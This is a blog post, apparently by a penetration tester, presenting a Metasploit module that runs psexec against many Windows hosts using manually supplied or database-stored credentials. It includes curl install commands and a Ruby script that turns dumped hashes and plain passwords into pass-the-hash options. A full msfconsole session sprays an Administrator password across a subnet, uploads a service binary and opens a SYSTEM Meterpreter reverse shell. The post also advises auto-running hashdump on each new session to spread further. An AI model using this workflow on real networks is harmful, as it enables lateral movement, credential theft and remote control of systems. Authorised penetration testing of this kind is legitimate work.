Some time ago I was talking with Martin Bos, also known as @pure_hate, one of the members of the BackTrack development team and a pentester. He mentioned that he would love a better way of using the psexec module already in the framework, something easier than the resource scripts he had to modify and play with for each engagement. So I took it upon myself to write an auxiliary scanner module for him to use in engagements. At the same time Larry Pesce from PaulDotCom came to me with a similar requirement for his pentests against client environments: he wanted to re-use the credentials he gathered inside the framework and stored in its database. So I came up with the following requirements:
The module I wrote can be found on my GitHub page under psexec_scanner. To use the module you need to place it in your ~/.msf4 module tree:
mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/
curl -O https://raw.github.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb
Now the module is available to any instance of the framework we load on the system, which makes it easier to use across forks of the repository. Modules under ~/.msf4/modules are picked up when msfconsole starts, so restart it (or run reload_all) if it was already open when you copied the file.
Once inside msfconsole we can load the module and look at the options it provides:
msf > use auxiliary/scanner/smb/psexec_scanner
msf auxiliary(psexec_scanner) > show options
Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       Local Port for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS    1                                yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)
As we can see, the TYPE option gives two ways of handling credentials: manual, where we set a single credential to test against several systems, and db, where the module uses the credentials already stored in the database for the current workspace. Database credentials are used whether they are stored in plain text or in SMB hash format (LM:NTLM, as produced by hashdump), so the module picks up both the hashes dumped from compromised systems and the passwords found through brute forcing with the smb_login module. A hash is passed to the target as-is (pass-the-hash), so nothing needs to be cracked first. I did not add brute forcing with user and password lists, since the smb_login module is much better suited for that task. Having the module use the options this way makes it ideal for leveraging an initial compromise of a few systems and expanding it across a wider range.
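As an added illustration (this is not code from the psexec_scanner module or from the framework), the Ruby below shows how credentials from the two sources the module draws on, a hashdump and a list of cracked or guessed passwords, can be normalised into the SMBDomain, SMBUser and SMBPass tuples the module hands to psexec. The hashdump line format, the DOMAIN\user:password list format and all sample accounts and hashes are constructed for the example; the only thing taken from the framework is the 32-hex:32-hex shape its SMB client recognises as an LM:NTLM hash.

```ruby
#!/usr/bin/env ruby
# Added example, not the psexec_scanner module's own code. Normalises
# credentials from a hashdump and from a plain-text list into the tuples
# psexec_scanner sets as SMBDomain / SMBUser / SMBPass.

# A password of the form <32 hex>:<32 hex> (LM:NTLM) is treated by the
# framework's SMB client as a hash and replayed via pass-the-hash.
HASH_RE = /\A[0-9a-f]{32}:[0-9a-f]{32}\z/i

# NT hash of the empty password: such accounts cannot be used with psexec,
# so hashdump lines carrying it are skipped.
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

Cred = Struct.new(:domain, :user, :secret, :kind) do
  # Datastore options psexec_scanner would set before calling psexec.
  def to_options
    { 'SMBDomain' => domain, 'SMBUser' => user, 'SMBPass' => secret }
  end
end

# Parse hashdump/pwdump lines: user:rid:lmhash:nthash:::
def parse_hashdump(text, domain = 'WORKGROUP')
  text.each_line.each_with_object([]) do |line, creds|
    user, _rid, lm, nt = line.strip.split(':')
    next if nt.nil?                          # blank or truncated line
    secret = "#{lm}:#{nt}".downcase
    next unless secret =~ HASH_RE            # malformed hash fields
    next if nt.downcase == EMPTY_NT          # empty password, useless for psexec
    creds << Cred.new(domain, user, secret, :hash)
  end
end

# Parse "DOMAIN\user:secret" or "user:secret" lines (e.g. smb_login results).
# The secret may itself be an LM:NTLM hash; split on the first ':' only so
# passwords containing ':' survive.
def parse_plain(text, default_domain = 'WORKGROUP')
  text.each_line.map do |line|
    line = line.strip
    next if line.empty?
    account, secret = line.split(':', 2)
    next if secret.nil? || secret.empty?
    domain, user = account.include?('\\') ? account.split('\\', 2) : [default_domain, account]
    kind = secret =~ HASH_RE ? :hash : :plain
    Cred.new(domain, user, secret, kind)
  end.compact
end

# Merge several credential lists, dropping duplicates (domain and user are
# case-insensitive on Windows; hashes are compared lower-cased).
def unique_creds(*lists)
  seen = {}
  lists.flatten.each do |c|
    key = [c.domain.downcase, c.user.downcase, c.secret.downcase]
    seen[key] ||= c
  end
  seen.values
end

# Constructed sample data (not from a real engagement).
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
DUMP

SAMPLE_PLAIN = <<~LIST
  Administrator:Newsystem01
  CORP\\svc_backup:Summer2011!
  Administrator:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
LIST

def all_creds
  unique_creds(parse_hashdump(SAMPLE_HASHDUMP), parse_plain(SAMPLE_PLAIN))
end

if __FILE__ == $0
  all_creds.each { |c| puts "#{c.kind.to_s.ljust(5)} #{c.to_options.inspect}" }
end
```

Running the script lists four credential sets: the Guest line is dropped because its NT hash is the empty-password hash, and the upper-cased Administrator hash in the plain list collapses onto the one already taken from the hashdump.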
Let's do a sample run against a range of target systems using a set of credentials I was able to obtain by other means. We start by setting the payload options, the range to scan, the credentials and the number of threads to use:
msf auxiliary(psexec_scanner) > set LHOST 172.16.163.1
LHOST => 172.16.163.1
msf auxiliary(psexec_scanner) > set LPORT 4444
LPORT => 4444
msf auxiliary(psexec_scanner) > set RHOSTS 172.16.163.2-150
RHOSTS => 172.16.163.2-150
msf auxiliary(psexec_scanner) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(psexec_scanner) > set SMBPass Newsystem01
SMBPass => Newsystem01
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
Once everything is set we can launch the scan against the range:
msf auxiliary(psexec_scanner) > run
[*] Using the username and password provided
#<#<Class:0x007fc88d91aef8>:0x007fc88c53c690>
[*] Starting exploit multi handler
[*] Started reverse handler on 172.16.163.1:4444
[*] Starting the payload handler...
[*] Scanned 019 of 149 hosts (012% complete)
[*] Scanned 030 of 149 hosts (020% complete)
[*] Scanned 045 of 149 hosts (030% complete)
[*] Scanned 060 of 149 hosts (040% complete)
[*] Scanned 075 of 149 hosts (050% complete)
[*] Scanned 090 of 149 hosts (060% complete)
[*] Scanned 105 of 149 hosts (070% complete)
[*] Scanned 120 of 149 hosts (080% complete)
[*] 172.16.163.141:445 - TCP OPEN
[*] Trying Administrator:Newsystem01
[*] Connecting to the server...
[*] Authenticating to 172.16.163.141:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Scanned 136 of 149 hosts (091% complete)
[*] Created \tMxFrkje.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PKTFMpHK - "MHLGojYuKIPncRpRNJynImVk")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \tMxFrkje.exe...
[*] Sending stage (752128 bytes) to 172.16.163.141
[*] Meterpreter session 1 opened (172.16.163.1:4444 -> 172.16.163.141:49159) at 2011-12-15 20:23:52 -0400
[*] Scanned 149 of 149 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_scanner) > sessions -l
Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K8R2-01  172.16.163.1:4444 -> 172.16.163.141:49159
msf auxiliary(psexec_scanner) >
A great way to keep leveraging the access is to have smart_hashdump and the credential-gathering post modules run automatically against every session the scan opens, either by passing AutoRunScript through the module's OPTIONS setting or by chaining them as a macro. The hashes they collect go into the database, so the next run with TYPE set to db can reuse them against the rest of the range.
Hope you find this blog post useful, as always.